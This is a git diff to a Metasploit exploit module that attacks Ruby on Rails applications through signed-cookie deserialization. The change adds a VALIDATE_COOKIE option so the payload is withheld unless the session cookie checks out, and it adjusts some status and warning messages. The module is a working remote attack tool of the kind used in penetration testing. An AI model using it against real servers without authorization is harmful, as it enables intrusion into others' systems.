diff --git a/modules/exploits/multi/http/rails_secret_deserialization.rb b/modules/exploits/multi/http/rails_secret_deserialization.rb
index 3a7dbdadcd..15b2a0810f 100644
--- a/modules/exploits/multi/http/rails_secret_deserialization.rb
+++ b/modules/exploits/multi/http/rails_secret_deserialization.rb
@@ -136,6 +136,7 @@ class Metasploit3 < Msf::Exploit::Remote
 				OptString.new('DIGEST_NAME', [ true, 'The digest type used to HMAC the session cookie','SHA1']),
 				OptString.new('SALTENC', [ true, 'The encrypted cookie salt', 'encrypted cookie']),
 				OptString.new('SALTSIG', [ true, 'The signed encrypted cookie salt', 'signed encrypted cookie']),
+				OptBool.new('VALIDATE_COOKIE', [ false, 'Only send the payload if the session cookie is validated', true]),
 
 			], self.class)
 	end
@@ -252,14 +253,19 @@ class Metasploit3 < Msf::Exploit::Remote
 				fail_with(Exploit::Failure::BadConfig, "SECRET does not match")
 			end
 		else
-			print_status("Caution: Cookie not found, maybe you need to adjust TARGETURI")
+			print_warning("Caution: Cookie not found, maybe you need to adjust TARGETURI")
 			if cookie_name.nil? || cookie_name.empty?
 				# This prevents trying to send busted cookies with no name
 				fail_with(Exploit::Failure::BadConfig, "No cookie found and no name given")
 			end
-			print_warning("Sending payload anyway! ;)")
+			if datastore['VALIDATE_COOKIE']
+				fail_with(Exploit::Failure::BadConfig, "COOKIE not validated, set VALIDATE_COOKIE to false send the payload without validation")
+			else
+				print_status("Trying to leverage default controller without cookie confirmation.")
+			end
 		end
 
+		print_status "Sending cookie #{cookie_name}"
 		res = send_request_cgi({
 			'uri'     => datastore['TARGETURI'] || "/",
 			'method'  => datastore['HTTP_METHOD'],